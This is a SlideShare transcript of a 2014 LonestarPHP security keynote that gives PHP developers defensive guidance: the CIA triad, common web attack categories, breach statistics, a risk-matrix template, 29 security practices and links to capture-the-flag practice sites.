Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Alison Gianotto
@snipeyhead
Alison Gianotto (aka “snipe”)WHO AM I?
• Former	
  agency	
  CTO/CSO	
  
• Security	
  &	
  privacy	
  advocate	
  
• 20	
...
WHAT SECURITY ISN’T
1 Bolted on
2 Compliance
3 A Single Person
4 Outsourced
3	
  
You	
  don’t	
  add	
  it	
  on	
  at	
 ...
WHAT SECURITY ISN’T
5 An Appliance
6 Silver Bullet
7 Straightforward
4	
  
Firewalls	
  and	
  IDS	
  are	
  part	
  of	
 ...
WHAT RISK ISN’T
1 Stifling
2 Boring
3 Avoidable
5	
  
Managing	
  risk	
  doesn’t	
  have	
  to	
  
hinder	
  innovaUon	
 ...
IT IS IMPOSSIBLE TO ANTICIPATE
EVERY RISK.
6	
  Lonestar	
  PHP	
  -­‐	
  April	
  2014	
  -­‐	
  #lsp14	
  
Srsly.
DEFENSE IN DEPTH PROMISES
7	
  Lonestar	
  PHP	
  -­‐	
  April	
  2014	
  -­‐	
  #lsp14	
  
• MiUgates	
  single	
  points...
DEFENSE IN DEPTH PROBLEMS
8	
  Lonestar	
  PHP	
  -­‐	
  April	
  2014	
  -­‐	
  #lsp14	
  
• Larger,	
  more	
  complicat...
CIA
Confidentiality,
Integrity &
Availability
CONFIDENTIALITY IS A SET OF
RULES THAT LIMITS ACCESS TO
INFORMATION
10	
  Lonestar	
  PHP	
  -­‐	
  April	
  2014	
  -­‐	
...
CONFIDENTIALITY EXAMPLES
11	
  Lonestar	
  PHP	
  -­‐	
  April	
  2014	
  -­‐	
  #lsp14	
  
• Passwords.	
  (boo!)	
  
• D...
CONFIDENTIALITY RISKS
12	
  Lonestar	
  PHP	
  -­‐	
  April	
  2014	
  -­‐	
  #lsp14	
  
• No	
  brute-­‐force	
  detecUon...
INTEGRITY IS THE ASSURANCE
THAT THE INFORMATION IS
TRUSTWORTHY & ACCURATE.
13	
  Lonestar	
  PHP	
  -­‐	
  April	
  2014	
...
INTEGRITY RISKS
14	
  Lonestar	
  PHP	
  -­‐	
  April	
  2014	
  -­‐	
  #lsp14	
  
• Data	
  loss	
  due	
  to	
  hardware...
AVAILABILITY IS A GUARANTEE OF
READY ACCESS TO THE INFO BY
AUTHORIZED PEOPLE.
15	
  Lonestar	
  PHP	
  -­‐	
  April	
  201...
AVAILABILITY RISKS
16	
  Lonestar	
  PHP	
  -­‐	
  April	
  2014	
  -­‐	
  #lsp14	
  
• DDoS	
  aJacks	
  
• Third-­‐party...
THINK YOU’RE TOO SMALL
TO BOTHER WITH?
17	
  Lonestar	
  PHP	
  -­‐	
  April	
  2014	
  -­‐	
  #lsp14	
  
Think again.
WHY HACK?
18	
  Lonestar	
  PHP	
  -­‐	
  April	
  2014	
  -­‐	
  #lsp14	
  
• To	
  steal/sell	
  idenUUes,	
  credit	
  ...
COMMON ATTACKS
19	
  Lonestar	
  PHP	
  -­‐	
  April	
  2014	
  -­‐	
  #lsp14	
  
• Reflected	
  XSS	
  
• Persistent	
  XS...
WHY MEEEEEEEEEEEE??
20	
  Lonestar	
  PHP	
  -­‐	
  April	
  2014	
  -­‐	
  #lsp14	
  
• Users	
  re-­‐use	
  passwords	
 ...
IN 2013, 61% OF REPORTED
ATTACKS TARGETED SMALL AND
MEDIUM BUSINESSES, UP FROM
50% IN 2012.
21	
  Lonestar	
  PHP	
  -­‐	
...
1 2 43
REFLECTED XSS
SOCIAL	
  	
  
ENGINEERING	
  
XSS	
   SESSION	
  
HIJACK	
  
PWNED	
  
22	
  Lonestar	
  PHP	
  -­‐	...
77% OF LEGITIMATE WEBSITES HAD
EXPLOITABLE VULNERABILITIES.
1-IN-8 HAD A CRITICAL
VULNERABILITY.
23	
  Lonestar	
  PHP	
  ...
MEGA BREACHES: RESULTING IN
PERSONAL DETAILS OF >= 10
MILLION IDENTITIES EXPOSED IN AN
INDIVIDUAL INCIDENT.
24	
  Lonestar...
THERE WERE EIGHT IN 2013,
COMPARED WITH ONLY ONE IN 2012.
25	
  Lonestar	
  PHP	
  -­‐	
  April	
  2014	
  -­‐	
  #lsp14	
...
OCT 2013: ADOBE
EXPOSED CUSTOMER DATA, DEBIT/
CREDIT CARD NUMBERS, SOURCE
IMPACTED: 152 MILLION USERS
26	
  Lonestar	
  PH...
DEC 2013: TARGET
EXPOSED CUSTOMER DATA, DEBIT/
CREDIT CARD NUMBERS, PINS
IMPACTED: 110 MILLION USERS
27	
  Lonestar	
  PHP...
BREACHGrowth
•  credit  card  info
•  birth  dates
•  government  ID  numbers
•  home  addresses
•  medical  records
•  ph...
190,000
464,000
570,000
2011	
   2012	
   2013	
  
ATTACKS
29	
  
Source:	
  Symantec	
  Internet	
  Security	
  Threat	
 ...
APPSEC STRATEGY
PICK	
  TWO	
  
30	
  
COMPLETELY	
  BONED	
  COMPLETELY	
  BONED	
  
COMPLETELY	
  BONED	
  
Lonestar	
  ...
CREATING A RISK MATRIX
31	
  Lonestar	
  PHP	
  -­‐	
  April	
  2014	
  -­‐	
  #lsp14	
  
• Type	
  
• Third-­‐Party	
  
•...
29 THINGS YOU CAN START
DOING TODAY.
32	
  Lonestar	
  PHP	
  -­‐	
  April	
  2014	
  -­‐	
  #lsp14	
  
Dooo eeeeeet.
33	
  Lonestar	
  PHP	
  -­‐	
  April	
  2014	
  -­‐	
  #lsp14	
  
1.  Start	
  every	
  project	
  risk-­‐first.	
  
2.  S...
34	
  Lonestar	
  PHP	
  -­‐	
  April	
  2014	
  -­‐	
  #lsp14	
  
5.  Trust	
  your	
  gut.	
  If	
  something	
  doesn’t...
35	
  Lonestar	
  PHP	
  -­‐	
  April	
  2014	
  -­‐	
  #lsp14	
  
9.  Don't	
  abstract	
  code/systems	
  if	
  you	
  d...
36	
  Lonestar	
  PHP	
  -­‐	
  April	
  2014	
  -­‐	
  #lsp14	
  
11. 	
  Automate	
  EVERYTHING	
  (Chef,	
  Vagrant,	
 ...
37	
  Lonestar	
  PHP	
  -­‐	
  April	
  2014	
  -­‐	
  #lsp14	
  
15. 	
  Create	
  a	
  reliable	
  data	
  backup	
  pl...
29 THINGS TO DO TODAY
38	
  Lonestar	
  PHP	
  -­‐	
  April	
  2014	
  -­‐	
  #lsp14	
  
20. 	
  Strip	
  specific	
  messa...
29 THINGS TO DO TODAY
39	
  Lonestar	
  PHP	
  -­‐	
  April	
  2014	
  -­‐	
  #lsp14	
  
26. 	
  Supress	
  debugging	
  a...
CAPTURE ALL THE FLAGS!
40	
  Lonestar	
  PHP	
  -­‐	
  April	
  2014	
  -­‐	
  #lsp14	
  
•  NotSoSecure	
  CTF:	
  hJp://...
Alison Gianotto (aka “snipe”)THANK YOU!
• @snipeyhead	
  on	
  TwiJer	
  
• snipe@snipe.net	
  
41	
  Lonestar	
  PHP	
  -...
Upcoming SlideShare
Loading in …5
×

LonestarPHP 2014 Security Keynote

2,020 views

Published on

Keynote for LonestarPHP 2014

Published in: Technology, Business
  • Be the first to comment

LonestarPHP 2014 Security Keynote

  1. 1. Alison Gianotto @snipeyhead
  2. 2. Alison Gianotto (aka “snipe”)WHO AM I? • Former  agency  CTO/CSO   • Security  &  privacy  advocate   • 20  years  in  IT  and  so<ware  development   • Co-­‐author  of  a  few  PHP/MySQL  books   • Survivor  of  more  corporate  audits  than  I   care  to  remember   • @snipeyhead  on  TwiJer   2  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  
  3. 3. WHAT SECURITY ISN’T 1 Bolted on 2 Compliance 3 A Single Person 4 Outsourced 3   You  don’t  add  it  on  at  the  end.     You  can  be  compliant  and  not   secure.  Just  ask  Target.   Security  is  everyone’s  responsibility.   Throwing  money  at  this  problem   won’t  work.   Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  
  4. 4. WHAT SECURITY ISN’T 5 An Appliance 6 Silver Bullet 7 Straightforward 4   Firewalls  and  IDS  are  part  of  the   soluUon,  but  not  the  end.   There  is  no  one  thing.  Defence  in   depth  maJers.  Sort  of.     SomeUmes  implemenUng  security   tools  increases  your  aJack  surface.   Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   8 Done Security  is  where  you  start,  not   where  you  finish.  
  5. 5. WHAT RISK ISN’T 1 Stifling 2 Boring 3 Avoidable 5   Managing  risk  doesn’t  have  to   hinder  innovaUon   Our  job  is  finding  creaUve  soluUons   to  problems.  This  is  one  more  tool.   Risk  isn’t  inherently  bad.  Not   understanding  your  risk  is.     Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   4 One Size Acceptable  risk  to  your  company   may  not  be  the  same  as  someone   else’s.    
  6. 6. IT IS IMPOSSIBLE TO ANTICIPATE EVERY RISK. 6  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   Srsly.
  7. 7. DEFENSE IN DEPTH PROMISES 7  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • MiUgates  single  points  of  failure.  (“Bus  factor”)   • Requires  more  effort  on  the  part  of  the  aJacker,   theoreUcally  exhausUng  aJacker  resources.     Except...
  8. 8. DEFENSE IN DEPTH PROBLEMS 8  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • Larger,  more  complicated  systems  are  harder  to  maintain.     • Leads  to  more  cracks  for  bad  guys  to  poke  at   • More  surfaces  that  can  get  be  overlooked     • The  bad  guys  have  nearly  limitless  resources.  We  don’t.     • AJacks  are  commodiUzed  now.    Botnets  for  $2/hour.  
  9. 9. CIA Confidentiality, Integrity & Availability
  10. 10. CONFIDENTIALITY IS A SET OF RULES THAT LIMITS ACCESS TO INFORMATION 10  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  
  11. 11. CONFIDENTIALITY EXAMPLES 11  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • Passwords.  (boo!)   • Data  encrypUon  (at  rest  and   in  transmission.)   • Two-­‐factor  authenUcaUon/ biometrics.  (Yay!)   • Corporate  VPN   • IP  WhitelisUng   • SSH  keys  
  12. 12. CONFIDENTIALITY RISKS 12  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • No  brute-­‐force  detecUon   • No  velng  of  how  third-­‐ party  vendors  use/store   customer  data   • InformaUon  leakage  from   login  messages  (Uming   aJacks,  etc.)   • SQL  injecUon     • Privilege  escalaUon  leading   to  admin  access     • Passwords  shared  across   websites   • Improper  disposal/ destrucUon  of  personal   data   • Lost/stolen  devices    
  13. 13. INTEGRITY IS THE ASSURANCE THAT THE INFORMATION IS TRUSTWORTHY & ACCURATE. 13  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  
  14. 14. INTEGRITY RISKS 14  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • Data  loss  due  to  hardware   failure  (server  crash!)   • So<ware  bug  that   unintenUonally  deletes/ modifies  data   • Data  alteraUon  via   authorized  persons  (human   error)   • Data  alteraUon  via   unauthorized  persons   (hackers)   • No  backups  or  no  way  to   verify  the  integrity  of  the   backups  you  have   • Third-­‐party  vendor  with   inadequate  security  
  15. 15. AVAILABILITY IS A GUARANTEE OF READY ACCESS TO THE INFO BY AUTHORIZED PEOPLE. 15  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  
  16. 16. AVAILABILITY RISKS 16  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • DDoS  aJacks   • Third-­‐party  service  failures   • Hardware  failures   • So<ware  bugs   • Untested  so<ware  patches   • Natural  disasters   • Man-­‐made  disasters  
  17. 17. THINK YOU’RE TOO SMALL TO BOTHER WITH? 17  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   Think again.
  18. 18. WHY HACK? 18  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • To  steal/sell  idenUUes,  credit   card  numbers,  corporate   secrets,  military  secrets   • Fun,  Excitement  and/or   Notoriety   • PoliUcal  (“HackUvism”)   • Revenge   • Blackhat  SEO   • ExtorUon/Ransomware  
  19. 19. COMMON ATTACKS 19  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • Reflected  XSS   • Persistent  XSS   • CSRF   • SQL  InjecUon   • Remote  file  inclusion     • Local  file  inclusion/directory   traversal   • HosUng  malware   • Defacement  for  SEO   (pharma,  etc)   • Privilege  escalaUon    
  20. 20. WHY MEEEEEEEEEEEE?? 20  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • Users  re-­‐use  passwords   across  websites   • Watering  hole  aJack   • Low-­‐hanging  fruit   • Assumed  fewer  defenses   • To  gain  more  informaUon  on   users  to  execute  spear-­‐ phishing  aJacks   • Because  you  are  vulnerable.   Period.  
  21. 21. IN 2013, 61% OF REPORTED ATTACKS TARGETED SMALL AND MEDIUM BUSINESSES, UP FROM 50% IN 2012. 21  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   Source:  Symantec  Internet  Security  Threat  Report  2014  ::  Volume  19,  Published  April  2014    
  22. 22. 1 2 43 REFLECTED XSS SOCIAL     ENGINEERING   XSS   SESSION   HIJACK   PWNED   22  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  
  23. 23. 77% OF LEGITIMATE WEBSITES HAD EXPLOITABLE VULNERABILITIES. 1-IN-8 HAD A CRITICAL VULNERABILITY. 23  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   Source:  Symantec  Internet  Security  Threat  Report  2014  ::  Volume  19,  Published  April  2014    
  24. 24. MEGA BREACHES: RESULTING IN PERSONAL DETAILS OF >= 10 MILLION IDENTITIES EXPOSED IN AN INDIVIDUAL INCIDENT. 24  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  
  25. 25. THERE WERE EIGHT IN 2013, COMPARED WITH ONLY ONE IN 2012. 25  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   Source:  Symantec  Internet  Security  Threat  Report  2014  ::  Volume  19,  Published  April  2014     +700%
  26. 26. OCT 2013: ADOBE EXPOSED CUSTOMER DATA, DEBIT/ CREDIT CARD NUMBERS, SOURCE IMPACTED: 152 MILLION USERS 26  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   Source:  Symantec  Internet  Security  Threat  Report  2014  ::  Volume  19,  Published  April  2014    
  27. 27. DEC 2013: TARGET EXPOSED CUSTOMER DATA, DEBIT/ CREDIT CARD NUMBERS, PINS IMPACTED: 110 MILLION USERS 27  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   Source:  Symantec  Internet  Security  Threat  Report  2014  ::  Volume  19,  Published  April  2014    
  28. 28. BREACHGrowth •  credit  card  info •  birth  dates •  government  ID  numbers •  home  addresses •  medical  records •  phone  numbers •  financial  informa9on •  email  addresses •  login •  passwords Data Stolen 28  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   232   552   0   100   200   300   400   500   600   2011   2013   Iden99es  Stolen  by  Year  (in  Millions)   Source:  Symantec  Internet  Security  Threat  Report  2014  ::  Volume  19,  Published  April  2014    
  29. 29. 190,000 464,000 570,000 2011   2012   2013   ATTACKS 29   Source:  Symantec  Internet  Security  Threat  Report  2014  ::  Volume  19,  Published  April  2014     Per Day Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  
  30. 30. APPSEC STRATEGY PICK  TWO   30   COMPLETELY  BONED  COMPLETELY  BONED   COMPLETELY  BONED   Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  
  31. 31. CREATING A RISK MATRIX 31  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • Type   • Third-­‐Party   • Dataflow  diagram  ID   • DescripUon   • Triggering  AcUon   • Consequence  of  Service   Failure   • Risk  of  Failure   • User  Impact   • Method  used  for  monitoring   this  risk   • Efforts  to  MiUgate  in  Case  of   Failure   • Contact  info   Grab  a  starter  template  here!     hJp://snipe.ly/risk_matrix    
  32. 32. 29 THINGS YOU CAN START DOING TODAY. 32  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   Dooo eeeeeet.
  33. 33. 33  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   1.  Start  every  project  risk-­‐first.   2.  Start  using  a  risk  matrix  for  every  major  project  or   product.   3.  Build  a  clear  inventory  of  surface  areas  and  their  value.   Get  stakeholders  involved.   4.  Make  sure  you  understand  what  happens  when  third-­‐ party  services  fail  or  behave  unexpectedly.       29 THINGS TO DO TODAY
  34. 34. 34  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   5.  Trust  your  gut.  If  something  doesn’t  look  right,  it  probably   isn’t.   6.  Keep  your  systems  as  simple  as  possible.  Document  them.   7.  Favor  self-­‐documenUng  systems  so  that  code,  systems  and   docs  don't  fall  out  of  sync.   8.  Increased  transparency  reduces  risk  across  departments.   Consider  devops.     29 THINGS TO DO TODAY
  35. 35. 35  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   9.  Don't  abstract  code/systems  if  you  don’t  have  to.   Premature  opUmizaUon  is  the  devil.  Build  light  and   refactor  as  needed.   10.   Get  to  know  your  users’  behavior.  Use  tools  like  Google   AnalyUcs  and  heat-­‐mapping  to  understand  what  users  do   on  your  site.  Be  suspicious  if  it  changes  for  no  apparent   reason.   29 THINGS TO DO TODAY
  36. 36. 36  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   11.   Automate  EVERYTHING  (Chef,  Vagrant,  Ansible,  Salt,   Fabric,  etc.)   12.   Log  (almost!)  EVERYTHING.  Know  where  your  logs  are.   Use  a  central  logging  server  if  at  all  possible.     13.   Always  employ  the  principles  of  “least  privilege.”   14.   Give  preference  to  vendors  that  integrate  with  your  AD/     OD/LDAP.   29 THINGS TO DO TODAY
  37. 37. 37  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   15.   Create  a  reliable  data  backup  plan  and  TEST  IT.  (MORE   THAN  ONCE.)   16.   Create  a  Business  ConUnuity  Plan.   17.   Create  an  Incident  Response  Plan.  Test  it.   18.   Create  a  Disaster  Recovery  Plan.  TEST  IT.  (Seriously.)   19.   Get  your  team  to  parUcipate  in  at  least  one  CTF  every   year.     29 THINGS TO DO TODAY
  38. 38. 29 THINGS TO DO TODAY 38  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   20.   Strip  specific  messaging  from  login  forms.   21.   Use  solid  password+salUng  like  bcrypt.   22.   Implement  brute-­‐force  prevenUon  for  all  login  systems.   23.   Encrypt  everything,  where  feasible.   24.   Only  collect  the  data  that  you  absolutely  need.   25.   Implement  two-­‐factor  authenUcaUon.  It’s  easier  than  you   think.  
  39. 39. 29 THINGS TO DO TODAY 39  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   26.   Supress  debugging  and  server  informaUon  (PHP  versions,   Apache  versions)   27.   Leverage  framework  CSRF  protecUon  and  data   saniUzaUon/validaUon.   28.   Perform  regular  penetraUon  tests  and  vulnerability   assessments   29.   Become  a  passionate  security  ambassador  for  your  users   and  co-­‐workers.      
  40. 40. CAPTURE ALL THE FLAGS! 40  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   •  NotSoSecure  CTF:  hJp://cx.notsosecure.com   •  Security  Shepherd:  hJps://www.owasp.org/index.php/ OWASP_Security_Shepherd   •  hJp://hax.tor.hu/   •  hJps://pwn0.com/   •  hJp://www.smashthestack.org/   •  hJp://www.hellboundhackers.org/   •  hJp://www.overthewire.org/wargames/   •  hJp://counterhack.net/Counter_Hack/Challenges.html   •  hJp://www.hackthissite.org/   •  hJp://exploit-­‐exercises.com/   •  hJp://vulnhub.com/  
  41. 41. Alison Gianotto (aka “snipe”)THANK YOU! • @snipeyhead  on  TwiJer   • snipe@snipe.net   41  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  

×